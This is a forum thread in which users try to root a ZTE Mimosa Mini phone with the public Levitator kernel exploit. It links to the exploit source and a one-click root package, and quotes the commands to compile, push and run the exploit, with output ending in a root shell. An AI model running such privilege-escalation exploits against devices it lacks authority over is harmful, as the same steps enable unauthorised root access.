• After 15+ years, we've made a big change: Android Forums is now Early Bird Club. Learn more here.

ZTE Mimosa Mini [Root]

how can you make it work? can't find a program that roots it with this exploit?

I didn't find anything, but I read here that it should be possible. Still waiting for one of the experienced guys to confrim

Levitator: Root on your Android phone | Fortinet Security Blog


Also on this forums were download links, but deleted :p

http://www.meizume.com/meizu-m9-rooting-modding/13971-a2-3-5-temproot.html

Method 2 - Levitator

- You need to install SuperUser separately from the market (but only once), if you don't already have it on your phone.
- Then install m9.r00t.apk.
- Open it, press "Get r00t", wait for confirmation (very fast), and that's it!

The app has inbuilt auto start - activate once, and then your phone will be temprooted on boot. To disable, press "Un00t phone"

This would work too, I just need lucky patcher and titanium back up...
 
  • Like
Reactions: kolgujev
Upvote 0
i have the program lemme find it

www.shabbypenguin.com/OUDstuff/Random/Coolpad/quattro/levitator

youll need to run this via adbshell/terminal


When you say run via adbshell/terminal (I have terminal emulator installed on my phone) do you mean I should type all of this or just one part or something completely different?

$ CC="/path/to/arm-linux-androideabi-gcc"
* $ NDK="/path/to/ndk/arch-arm"
* $ CFLAGS="-I$NDK/usr/include/"
* $ LDFLAGS="-Wl,-rpath-link=$NDK/usr/lib -L$NDK/usr/lib -nostdlib $NDK/usr/lib/crtbegin_dynamic.o -lc"
* $ $CC -o levitator levitator.c $CFLAGS $LDFLAGS
* $ adb push levitator /data/local/tmp/
* $ adb shell
* $ cd /data/local/tmp
* $ ./levitator
* [+] looking for symbols...
* [+] resolved symbol commit_creds to 0xc00770dc
* [+] resolved symbol prepare_kernel_cred to 0xc0076f64
* [+] resolved symbol dev_attr_ro to 0xc05a5834
* [+] opening prvsrvkm device...
* [+] dumping kernel memory...
* [+] searching kmem for dev_attr_ro pointers...
* [+] poisoned 16 dev_attr_ro pointers with fake_dev_attr_ro!
* [+] clobbering kmem with poisoned pointers...
* [+] triggering privesc via block ro sysfs attribute...
* [+] restoring original dev_attr_ro pointers...
* [+] restored 16 dev_attr_ro pointers!
* [+] privileges escalated, enjoy your shell!
* # id
* uid=0(root) gid=0(root)
 
Upvote 0
congrats you just found it, gimme a bit and ill make a one click script that will install root :)

Ok, I'll have to check it out tomorrow since It's getting late here. You just leave what is to be downloaded and instructions and I'll try it first thing tomorrow and let you know. If it works I shall forever be in your debt...

P.S.

Here is the link to what I have copied over :D

http://jon.oberheide.org/files/levitator.c
 
Upvote 0
www.shabbypenguin.com/OUDstuff/Random/ZTE/mimosa-mini/levitator root.zip

enable usb debugging
extract teh zip and run teh script within :)

ive never used this exploit so lemme know h ow this all works out

Damn, device not found... I don't have ADB like I said. So it doesn't recognize debugging. You hear usual sound when you connect debugging, then additional 3 beeps. As soon as I find right drivers I shall try... Storage mode works good.

(As you can see in the pic few posts above there is Android Phone then Android Composite ADB interface, which is what I need, had it before, but I just re-installed my OS on pc 2 days ago and lost it)
 
Upvote 0
Upvote 0
de7mup.jpg
 
Upvote 0

BEST TECH IN 2023

We've been tracking upcoming products and ranking the best tech since 2007. Thanks for trusting our opinion: we get rewarded through affiliate links that earn us a commission and we invite you to learn more about us.

Smartphones